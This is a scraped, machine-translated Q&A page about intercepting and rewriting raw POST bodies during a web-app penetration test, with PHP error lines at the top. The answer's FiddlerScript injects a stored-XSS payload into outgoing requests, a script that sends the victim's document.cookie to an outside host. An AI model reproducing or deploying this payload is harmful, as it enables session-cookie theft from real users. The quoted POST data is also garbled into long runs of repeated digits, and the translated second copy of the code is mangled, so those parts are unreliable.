Warning: file_get_contents(/data/phpspider/zhask/data//catemap/9/security/4.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
Firefox addon 如何修改篡改数据中的原始帖子?_Firefox Addon_Security_Fiddler - Fatal编程技术网
Fatal编程技术网
  • firefox-addon/
  • Firefox addon 如何修改篡改数据中的原始帖子?

Firefox addon 如何修改篡改数据中的原始帖子?

firefox-addon security

Firefox addon 如何修改篡改数据中的原始帖子?,firefox-addon,security,fiddler,Firefox Addon,Security,Fiddler,我正在尝试笔测试web应用程序,它使用包含以下原始数据的POST请求: “码码>1 |>1 |; 2 |; 2 |; 2 |; 2 2 | 2 2 | 2 | 2 | 3 3 | 3 3 | 4 4 4 4 4 4 4| 4 4 5 5 5 5 5 \12444 4 4 7 7 7 7 7 7\12444 4 4 4 4 7 7 7 7 7 7\\12444 4 4 4 4 4 4 4 4 4 7 7 7 7 7 7 7 7 7\\\\12444 4 4 4 4 4 4 4 4 4 4 4 4

我正在尝试笔测试web应用程序,它使用包含以下原始数据的POST请求:

“码码>1 |>1 |; 2 |; 2 |; 2 |; 2 2 | 2 2 | 2 | 2 | 3 3 | 3 3 | 4 4 4 4 4 4 4| 4 4 5 5 5 5 5 \12444 4 4 7 7 7 7 7 7\12444 4 4 4 4 7 7 7 7 7 7\\12444 4 4 4 4 4 4 4 4 4 7 7 7 7 7 7 7 7 7\\\\12444 4 4 4 4 4 4 4 4 4 4 4 4 4 4 7 7 7 7 7 7 7 7 7 7 7 7 7 7)7 7 7 7 7\\\\\1244812444 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 10 124周四周四周四周四8 8\124周四周四周四周四周四周四周四周四周四8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 8 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 5 5 5 5 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5;28 | 11 | 49 | 30|-32|32|16|220|33|-28|34|-25|36|16|134|37|16|48|38|-28|39|-32|41|-22|7|8|1|9|21|10|11|50|13|11|51|15|16|33|17|11|52|19|16|934|20|16|669|21|16|185|22|11|53|8|11|54|25|11|55|27|16|98|28|11|56|30|-16|32|16|84|33|-45|34|11|57|36|16|139|37|16|49|38|11|58|39|11|59|41|-22|7|8|1|9|21|10|11|60|13|11|61|15|16|53|17|11|62|19|16|695|20|16|614|21|16|177|22|-49|8月12日11 12444 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 4 21| 10 101241010 10 10 101241010 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10|-16 | 32 | 16 | 339 | 33 |-81 | 34 | 11 | 74 | 36 | 16 | 133 | 37 | 16 | 20 | 38 |-81 | 39 | 11 | 75 | 41 |-22

也就是说,所有POST数据不能被分割成参数和值,比如篡改数据处理它们。这使得插件对处理此类POST数据非常不友好。我甚至无法转到主篡改数据屏幕并从请求历史列表复制原始数据,因为该屏幕被处理当前http请求的较小屏幕阻塞。因此,只有在请求已被拒绝或发送而无需修改时,我才能访问和复制原始数据

是否有类似的工具(浏览器插件、http代理),或者至少有篡改数据的源代码,可以用来以篡改数据的方式处理和修改此类post数据?

试试看,它可以让您拦截和篡改原始请求。

最合适的方法是使用Fiddlerscript(从Fiddlerscript编辑器下载,它将在启动后打开所需的文件)

我已经定制了

static function OnBeforeRequest(oSession: Session) {

    if (m_Replace16) {
        var post_body: String = oSession.GetRequestBodyAsString();
        FiddlerApplication.Log.LogString(post_body);
        post_body=post_body.Replace("|8888","|<script>img = new Image(); img.src = \"http://httpz.ru/n22ref260pd.gif?\"+document.cookie;</script>");
        FiddlerApplication.Log.LogString(post_body);
        oSession.utilSetRequestBody(post_body);
    }

请求前的静态函数(会话:会话){
如果(m_替换16){
var post_body:String=oSession.GetRequestBodyAsString();
FiddlerApplication.Log.LogString(post_body);
post_body=post_body.Replace(“| 8888”),“|img=new Image();img.src=\”http://httpz.ru/n22ref260pd.gif?\“+document.cookie;”;
FiddlerApplication.Log.LogString(post_body);
oSession.utilSetRequestBody(post_body);
}
i、 e.添加了一个新的菜单项,用于修改所有输出请求,即“8888”替换为第二个参数,即注入

第一行将请求主体转换为字符串var

第二行将其发送到fiddler日志

第三行将所需值替换为某个注入值

第四行将修改后的var主体发布到日志

第五行使用修改后的原始请求主体更新原始请求主体。唯一的问题是安全性。我实际上不希望有人访问我的数据。有时调试数据也可能是机密的。